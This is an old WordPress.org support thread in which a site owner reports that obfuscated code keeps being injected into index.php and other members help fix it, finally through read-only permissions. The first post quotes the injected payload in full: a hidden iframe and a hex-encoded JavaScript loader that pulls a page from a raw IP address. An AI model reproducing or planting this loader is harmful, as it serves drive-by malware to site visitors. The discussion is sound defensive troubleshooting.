WordPress.org

Ready to get started?Download WordPress

Forums

[resolved] php inject problem in index.php (12 posts)

  1. iuolsac
    Member
    Posted 6 years ago #

    Hey,
    I have installed WordPress 2.3.3 on my domain and I configured everything. After a couple of hours, a few people that were reading the first entry told me of a problem with the website, anti-virus software found malicious code / trojans.
    Basically, it was corrupted. At first, I thought it was something wrong with one of the plugins i used, but I deleted WP and reinstalled from scratch and the problem was back again in a few hours.
    This line of code appears in php.ini:
    <iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v47da8689bd2a4(v47da8689bda9c){ function v47da8689be291 () {return 16;} return(parseInt(v47da8689bda9c,v47da8689be291()));}function v47da8689bf299(v47da8689bfc4e){ var v47da8689c11f1=2; var v47da8689c024a='';for(v47da8689c0a6f=0; v47da8689c0a6f<v47da8689bfc4e.length; v47da8689c0a6f+=v47da8689c11f1){ v47da8689c024a+=(String.fromCharCode(v47da8689bd2a4(v47da8689bfc4e.substr(v47da8689c0a6f, v47da8689c11f1))));}return v47da8689c024a;} document.write(v47da8689bf299('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D62207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A3133353432292B276562373538646335376462305C272077696474683D313833206865696768743D3734207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>

    I configured the .htaccess file and it didn't seem to help. :(
    Any input would be appreciated, thanks. :)

    PS: I'm pretty much noob at WP ^^

  2. Dalton
    Member
    Posted 6 years ago #

    Did you change all your passwords? You might want to change your WordPress admin username also. This may or may not have come in through WordPress, but it doesn't hurt to know about hardening WordPress.

  3. iuolsac
    Member
    Posted 6 years ago #

    Yes, I've changed everything right after install.
    I've done everything that is recommended in there, the code still appeared. ;(

  4. Dalton
    Member
    Posted 6 years ago #

    Do you know what versions of Apache and PHP your host is running? Could be an exploit there, too.

  5. iuolsac
    Member
    Posted 6 years ago #

    Apache version 2.2.8 (Unix)
    PHP version 5.2.5
    MySQL version 5.0.45-community-log
    Architecture x86_64
    Operating system Linux

    And update, I made the index.php file read-only - 644. The code appeared again. :/

  6. whooami
    Member
    Posted 6 years ago #

    You said this:

    This line of code appears in php.ini:

    Im assuming that is a mispeak, because thats not your index.php? If its being added to your php.ini that suggests a little more than a simple WP php injection attack.

    Also, I would be looking at your server logs.

  7. iuolsac
    Member
    Posted 6 years ago #

    Yes, I'm sorry. I meant index.php, I got confused a bit. ;(

  8. Dalton
    Member
    Posted 6 years ago #

    What theme are you using?

  9. iuolsac
    Member
    Posted 6 years ago #

    Elixir orange.

  10. Samuel Wood (Otto)
    Tech Ninja
    Posted 6 years ago #

    Try making it 444. See what happens.

    Sometimes webservers are configured to run as the user instead of as a separate user. In which case 644 permissions are still writable.

    Also, yes, you will need your server logs. Talk to your host.

  11. iuolsac
    Member
    Posted 6 years ago #

    Setting permissions to 444 seems to have fixed the problem. Thanks a lot for the replies. :)

  12. matrex722
    Member
    Posted 6 years ago #

    is there any solution for it without setting permissions 444 ?

    im suffering the the same

Topic Closed

This topic has been closed to new replies.

About this Topic